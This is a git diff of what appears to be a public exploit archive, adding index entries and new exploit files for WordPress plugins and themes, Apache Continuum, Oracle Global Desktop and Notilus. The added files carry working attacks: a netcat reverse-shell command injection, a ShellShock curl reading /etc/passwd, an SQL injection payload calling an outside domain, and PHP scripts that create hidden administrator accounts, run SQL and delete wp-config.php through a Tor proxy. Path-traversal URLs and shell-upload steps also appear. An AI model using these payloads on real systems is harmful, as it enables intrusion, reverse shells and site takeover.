diff --git a/files.csv b/files.csv index 7fe013597..7a1bdda4c 100755 --- a/files.csv +++ b/files.csv @@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0 15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0 15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0 -15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 +15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0 15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0 16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 @@ -17286,7 +17286,7 @@ id,file,description,date,author,platform,type,port 19930,platforms/windows/local/19930.rb,"Windows Escalate Task Scheduler XML Privilege Escalation",2012-07-19,metasploit,windows,local,0 19931,platforms/windows/remote/19931.rb,"Novell ZENworks Configuration Management Preboot Service 0x06 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 19932,platforms/windows/remote/19932.rb,"Novell ZENworks Configuration Management Preboot Service 0x21 - Buffer Overflow",2012-07-19,metasploit,windows,remote,998 -19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,metasploit,linux,local,0 +19933,platforms/linux/local/19933.rb,"Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)",2012-07-19,metasploit,linux,local,0 19937,platforms/windows/remote/19937.pl,"Simple Web Server 2.2 rc2 - Remote Buffer Overflow Exploit",2012-07-19,mr.pr0n,windows,remote,0 19938,platforms/beos/dos/19938.txt,"BeOS 5.0 TCP Fragmentation Remote DoS Vulnerability",2000-05-18,visi0n,beos,dos,0 19939,platforms/windows/remote/19939.html,"Microsoft Internet Explorer 4.0/5.0/5.5 preview/5.0.1 - DocumentComplete() Cross Frame Access Vulnerability",2000-05-17,"Andrew Nosenko",windows,remote,0 @@ -35511,7 +35511,7 @@ id,file,description,date,author,platform,type,port 39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0 39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21 39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0 -39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0 +39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root",2016-01-19,"Perception Point Team",linux,local,0 39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0 39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0 39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0 @@ -35998,6 +35998,7 @@ id,file,description,date,author,platform,type,port 39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0 39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848 39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0 +39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0 39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0 @@ -36063,3 +36064,18 @@ id,file,description,date,author,platform,type,port 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0 39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 +39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80 +39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0 +39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80 +39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0 +39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80 +39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80 +39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80 +39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS",2016-06-06,wp0Day.com,php,webapps,80 +39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80 +39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80 +39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80 +39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80 +39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80 +39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80 +39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80 diff --git a/platforms/asp/webapps/39897.txt b/platforms/asp/webapps/39897.txt new file mode 100755 index 000000000..4373a4d5a --- /dev/null +++ b/platforms/asp/webapps/39897.txt @@ -0,0 +1,64 @@ +Exploit Title: Notilus SQL injection +Product: Notilus travel solution software +Vulnerable Versions: 2012 R3 +Tested Version: 2012 R3 +Advisory Publication: 03/06/2016 +Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89] +CVE Reference: NONE +Credit: Alex Haynes + +Advisory Details: + + +(1) Vendor & Product Description +-------------------------------- + +Vendor: DIMO Software + + +Product & Version: +Notilus travel solution software v2012 R3 + + +Vendor URL & Download: +http://www.notilus.com/ + + +Product Description: +"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc." + + +(2) Vulnerability Details: +-------------------------- +The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields. + +Proof of concept: + +POST TO /company/profilv4/Password.aspx + +Vulnerable parameter: H_OLD + +Payload: +ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27 + + + + +(3) Advisory Timeline: +---------------------- +15/02/16 - First Contact: vendor requests details of vulnerability +03/03/16 - Follow up to vendor to inquire about availability of a fix. +03/03/16 - vendor responds that fix will be available 16/03/16. +16/03/16 - Vendor releases patch. + + + + +(4)Solution: +------------ +Patch to latest available 2012 R3 branch or upgrade to version 2016. + + +(5) Credits: +------------ +Discovered by Alex Haynes \ No newline at end of file diff --git a/platforms/cgi/webapps/39887.txt b/platforms/cgi/webapps/39887.txt new file mode 100755 index 000000000..89cec2546 --- /dev/null +++ b/platforms/cgi/webapps/39887.txt @@ -0,0 +1,17 @@ +# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop +# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client +# Date: 6/4/2016 +# Exploit Author: lastc0de@outlook.com +# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/ +# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html +# Version: 4.61.915 +# Tested on: Linux + +VULNERABLE FILE +http://target.com//tarantella/cgi-bin/modules.cgi + +POC : +localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt + +localhost@~#cat xixixi.txt +which will print out the content of /etc/passwd file. diff --git a/platforms/java/webapps/39886.txt b/platforms/java/webapps/39886.txt new file mode 100755 index 000000000..7af5ff680 --- /dev/null +++ b/platforms/java/webapps/39886.txt @@ -0,0 +1,48 @@ +# Exploit Title: Unauthenticated command injection - Apache Continuum +# Google Dork: inurl::8080/continuum/ +# Date: 04/06/2016 +# Exploit Author: David Shanahan (@cyberpunksec) +# Contact: http://www.procheckup.com/ +# Vendor Homepage: https://continuum.apache.org/ +# Software Link: https://continuum.apache.org/download.cgi +# Version: 1.4.2 +# Tested on: Debian + +--- Description --- + +Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/ +ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS. + +1) Command injection + +Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action + +Vulnerable Parameter - installation.varValue + +#!/bin/sh + +if [ $# -eq 0 ] + then + echo "$0 " + echo "Remember to set up your netcat listener" + exit 1 +fi + +cmd="\`nc $3 $4 -e /bin/sh\`" + +echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]" +echo "\t\t[ Procheckup - David Shanahan ]\n" +curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd" + + +2) Reflected XSS + +The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL. +If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them. + +Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel + +Fix: +The Apache Continuum project is no longer maintained. Removal of the software is recommended. + +http://www.procheckup.com/ diff --git a/platforms/linux/local/39277.c b/platforms/linux/local/39277.c index a39aa74f3..5460a569d 100755 --- a/platforms/linux/local/39277.c +++ b/platforms/linux/local/39277.c @@ -1,7 +1,9 @@ +/* # Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings # Date: 19/1/2016 # Exploit Author: Perception Point Team # CVE : CVE-2016-0728 +*/ /* CVE-2016-0728 local root exploit modified by Federico Bento to read kernel symbols from /proc/kallsyms diff --git a/platforms/php/webapps/39883.txt b/platforms/php/webapps/39883.txt new file mode 100755 index 000000000..3aa94f93d --- /dev/null +++ b/platforms/php/webapps/39883.txt @@ -0,0 +1,90 @@ +#################### +# Meta information # +#################### +# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities +# Date: 2016-06-02 +# Exploit Author: PizzaHatHacker [A] gmail [.] com +# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/ +# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip +# Version: 2.7.11 +# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2 +# +# History : +# 2016-02-21 Contact requested on the vendor website via "Contact Us" +# 2016-02-24 Contact requested on the vendor website via "Support" +# 2016-03-09 Email to plugins@wordpress.org +# 2016-03-10 Acknowledged by Wordpress team +# 2016-06-02 No information, no response, vulnerabilities not fixed, +# disclosure of this document. +# +################################## +### 1. Arbitrary File Deletion ### +################################## + +It is possible to remotely delete arbitrary files on the webserver on wordpress +blogs that have simple-backup plugin installed and enabled. No authentication +is required, the default configuration of simple-backup is affected. + +Example 1 : Delete "pizza.txt" in wordpress root : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt + +Example 2 : Delete .htaccess file protecting the backup folder : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting + +Note : When 'download_backup_file' parameter is provided with an invalid +filepath, the PHP script exits prematurely with message "Access Denied!" and so +does not regenerate automaticaly the .htaccess file. +After this request, it may be possible (depending on the web server +configuration) to browse the backup directory and download server backup files +at this URL : +http://127.0.0.1//simple-backup/ + +The backup archive files may contain all the wordpress files : configuration +files (wp-config.php etc.), PHP source code (plugins, etc.), and a database +dump (all tables content, wordpress users passwords etc.). + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P) +CVSS Base Score : 7.5 +Impact Subscore : 6.4 +Exploitability Subscore : 10 + +######################## +### 2. File Download ### +######################## + +It is possible to download remote files from the webserver on wordpress blogs +that have simple-backup plugin installed and enabled. No authentication is +required, the default configuration of simple-backup is affected. + +Example 1 : Download tools.php source file : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file= + +Example 2 : Download a backup file : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar + +(If backups are performed automatically at predefined times, it is easy to +find the backup file name, as it is based on the current time). + + +Moreover, the checks performed on user-provided 'filename' parameter are +insufficient : + +simple-backup-manager.php:function download_local_backup_file($filename){ +$filename = ltrim($filename, ".\/"); + +* Only logged-in AND authorized users (with permissions to manage backups) +should be allowed to download files +* The file name should match a backup file and must not be empty +* The input is not correctly checked for directory traversal (use PHP +'basename' instead of 'ltrim') + +For example in the special case where a folder 'oldBackups' is created inside +the backup directory, it would be possible to download ANY file on the web +server via direct requests to this kind of URLs : +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php +http://127.0.0.1//wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd + +CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N) +CVSS Base Score : 5 +Impact Subscore : 2.9 +Exploitability Subscore : 10 diff --git a/platforms/php/webapps/39884.html b/platforms/php/webapps/39884.html new file mode 100755 index 000000000..ed799bc0e --- /dev/null +++ b/platforms/php/webapps/39884.html @@ -0,0 +1,29 @@ + + + + +
+ + + + +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39889.html b/platforms/php/webapps/39889.html new file mode 100755 index 000000000..8a3680513 --- /dev/null +++ b/platforms/php/webapps/39889.html @@ -0,0 +1,37 @@ + + + + +
+ + + + +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/39890.txt b/platforms/php/webapps/39890.txt new file mode 100755 index 000000000..fe3c45208 --- /dev/null +++ b/platforms/php/webapps/39890.txt @@ -0,0 +1,22 @@ +# Exploit Title: Online examination system 1.0 - SQL Injection +# Google Dork: inurl:showtest.php?subid= +# Date: 2016/06/05 +# Exploit Author: Ali Ghanbari +# Vendor Homepage: http://www.onlinefreeprojectdownload.com +# Sofware Link : +http://www.onlinefreeprojectdownload.com/download.php?name=projects/php%20projects/Online_exam.zip +# Version: 1.0 + +#Exploit: + +http://localhost/{PATH}/showtest.php?subid=[SQL Injection] + +#Admin Panel: + +http://localhost/{PATH}/admin + +#################################### + +[+]Exploit by: Ali Ghanbari + +[+]My Telegram :@Exploiter007 diff --git a/platforms/php/webapps/39891.txt b/platforms/php/webapps/39891.txt new file mode 100755 index 000000000..830bfac6c --- /dev/null +++ b/platforms/php/webapps/39891.txt @@ -0,0 +1,34 @@ +#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload +#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector +#Date: 1-06-2015 +#Exploit Author: Aaditya Purani +#Author Details: https://aadityapurani.com +#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog +#Version: 3.5 +#Tested on: Kali Linux 2.0 Sana / Windows 10 + + +This Vulnerable has been disclosed to public yesterday about WP Mobile +Detector Arbitrary File upload for version <=3.5 in which attacker can +upload malicious PHP Files (Shell) into the Website. Over 10,000 users are +affected, Vendor has released a Patch in their version 3.6 & 3.7 at +https://wordpress.org/plugins/wp-mobile-detector/changelog/ . + +I have wrote a Complete POC post: + +https://aadityapurani.com/2016/06/03/mobile-detector-poc/ + +I have made a POC Video Here: +https://www.youtube.com/watch?v=ULE1AVWfHTU + +Simple POC: + +Go to: + +[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php] + +and it will get saved in directory: + +/wp-content/plugins/wp-mobile-detector/cache/shell.php + + diff --git a/platforms/php/webapps/39892.php b/platforms/php/webapps/39892.php new file mode 100755 index 000000000..d41e856dd --- /dev/null +++ b/platforms/php/webapps/39892.php @@ -0,0 +1,198 @@ + + * Vendor Homepage: http://bridge.qodeinteractive.com/ + * Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054 + * Version: 9.1.3 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: Stored XSS, Ability to overwrite any theme settings. + * Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:f:c:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + + +function exploit(){ + global $curl, $options; + + switch ($options['m']){ + case 'm' : + //Maintanence mode + echo "Putting site in maintenece mode\n"; + $data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes'); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ".$resp."\n"; + break; + case 'x' : + //XSS Mode, create extra admin + echo "Injecting inject.js \n"; + $data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js")); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ".$resp."\n"; + + break; + } + + + +} + + + +logIn(); +exploit(); + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + if ( !isset($options['u']) ){ + return false; + } + if ( !isset($options['p']) ){ + return false; + } + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){ + return false; + } + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} + +?> +inject.js +}); + +//Get Token +var domain = location.protocol+'//'+document.domain; +var url = domain+'/wp-admin/user-new.php'; +var JQ = jQuery.noConflict(); +JQ.ajax({ + "url": url, + "success" : function(x){ + //Got the response + console.log('Got response'); + var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g; + var m = re.exec(x); + if (m[2].match(/([a-z0-9]{10})/)) { + var nonce = m[2]; + console.log('Got nonce '+nonce); + } + console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin '); + JQ.ajax({ + "url": url, + "method" : "POST", + "data" : + { "action":"createuser", + "_wpnonce_create-user": nonce, + "_wp_http_referer" : "/wp-admin/user-new.php", + "user_login": "wp0day_poc", + "email" : "contact@wp0day.com", + "first_name" : "Exploit", + "last_name" : "Poc", + "url" : "http://wp0day.com/", + "pass1" : "secret", + "pass1-text" : "secret", + "pass2" : "secret", + "send_user_notification" : 0, + "role":"administrator", + "createuser" : "Add+New+User" + }, + "success" : function(x){ + console.log("Register done"); + } + }); + + } +}); + + + +$j(document).ready(function(){ diff --git a/platforms/php/webapps/39893.php b/platforms/php/webapps/39893.php new file mode 100755 index 000000000..c07bcf3b8 --- /dev/null +++ b/platforms/php/webapps/39893.php @@ -0,0 +1,177 @@ + + * Vendor Homepage: http://wordpress-advertising.com/ + * Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693 + * Version: 4.6.18 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: SQLi, Unserialize, File Delete. + * Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:f:c:u:p:s:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + +class CPDF_Adapter{ + + + private $_image_cache; + public function set_file($file){ + $this->_image_cache = array($file); + } +} + + + +function logIn(){ + global $curl, $options; + file_put_contents('cookies.txt',"\n"); + $curl->setCookieFile('cookies.txt'); + $curl->get($options['t']); + $data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In'); + $curl->post($options['t'].'/wp-login.php', $data); + $status = $curl->getTransferInfo('http_code'); + if ($status !== 302){ + echo "Login probably failed, aborting...\n"; + echo "Login response saved to login.html.\n"; + die(); + } + file_put_contents('login.html',$curl->getResponse()); + + +} + + + +function exploit(){ + global $curl, $options; + + if ($options['m'] == 'd'){ + echo "Delete mode\n"; + $pay_load_obj = new CPDF_Adapter(); + $pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' ); + $pay_load = base64_encode(serialize(array($pay_load_obj))); + $data = array('stats_pdf'=>'1', 'data'=>$pay_load); + $curl->post($options['t'].'?'.http_build_query($data)); + $resp = $curl->getResponse(); + echo $resp; + } else { + echo "SQLi mode \n"; + echo "Trying a longin...\n"; + logIn(); + echo "Running SQL in Inject mode: ".$options['s']."\n"; + $pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1); + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load); + $resp = $curl->getResponse(); + //Grab the output + if (preg_match('~
(.*?)(?: + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} + + diff --git a/platforms/php/webapps/39894.php b/platforms/php/webapps/39894.php new file mode 100755 index 000000000..78b933a4b --- /dev/null +++ b/platforms/php/webapps/39894.php @@ -0,0 +1,125 @@ + + * Vendor Homepage: http://tagdiv.com/newspaper/ + * Software Link: http://themeforest.net/item/newspaper/5489609 + * Version: 6.7.1 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: WP Options Overwrite, Possible more + * Time line: Found [23-APR-2016], Vendor notified [23-APR-2016], Vendor fixed: [27-APR-2016], [RD:1] + */ + + +require_once('curl.php'); +//OR +//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); +$curl = new CurlWrapper(); + + +$options = getopt("t:m:u:p:f:c:",array('tor:')); +print_r($options); +$options = validateInput($options); + +if (!$options){ + showHelp(); +} + +if ($options['tor'] === true) +{ + echo " ### USING TOR ###\n"; + echo "Setting TOR Proxy...\n"; + $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); + $curl->addOption(CURLOPT_PROXYTYPE,7); + echo "Checking IPv4 Address\n"; + $curl->get('https://dynamicdns.park-your-domain.com/getip'); + echo "Got IP : ".$curl->getResponse()."\n"; + echo "Are you sure you want to do this?\nType 'wololo' to continue: "; + $answer = fgets(fopen ("php://stdin","r")); + if(trim($answer) != 'wololo'){ + die("Aborting!\n"); + } + echo "OK...\n"; +} + +function exploit(){ + global $curl, $options; + switch ($options['m']){ + case "admin_on": + echo "Setting default role to Administrator \n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'administrator'); + break; + case "admin_off": + echo "Setting default role to Subscriber \n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[default_role]'=>'subscriber'); + break; + case "reg_on": + echo "Enabling registrations\n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'1'); + break; + case "reg_on": + echo "Disabling registrations\n"; + $data = array('action'=>'td_ajax_update_panel', 'wp_option[users_can_register]'=>'0'); + break; + + } + + $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); + $resp = $curl->getResponse(); + echo "Response: ". $resp."\n"; +} + + +exploit(); + + + +function validateInput($options){ + + if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ + return false; + } + + if (!preg_match('~/$~',$options['t'])){ + $options['t'] = $options['t'].'/'; + } + if (!isset($options['m']) || !in_array($options['m'], array('admin_on','reg_on','admin_off','reg_off') ) ){ + return false; + } + + $options['tor'] = isset($options['tor']); + + return $options; +} + + +function showHelp(){ + global $argv; + $help = << + @link http://github.com/svyatov/CurlWrapper + @license http://www.opensource.org/licenses/mit-license.html MIT License + +EOD; + echo $help."\n\n"; + die(); +} diff --git a/platforms/php/webapps/39895.php b/platforms/php/webapps/39895.php new file mode 100755 index 000000000..16ffc6b3f --- /dev/null +++ b/platforms/php/webapps/39895.php @@ -0,0 +1,152 @@ + + * Vendor Homepage: + * Software Link: http://themeforest.net/item/uncode-creative-multiuse-wordpress-theme/13373220 + * Version: 1.3.0 possible 1.3.1 + * Tested on: Debian 8, PHP 5.6.17-3 + * Type: RCE, Arbirary file UPLOAD, (Low Authenticated ) + * Time line: Found [24-APR-2016], Vendor notified [24-APR-2016], Vendor fixed: [27-APR-2016], [RD:1464134400] + */ + + 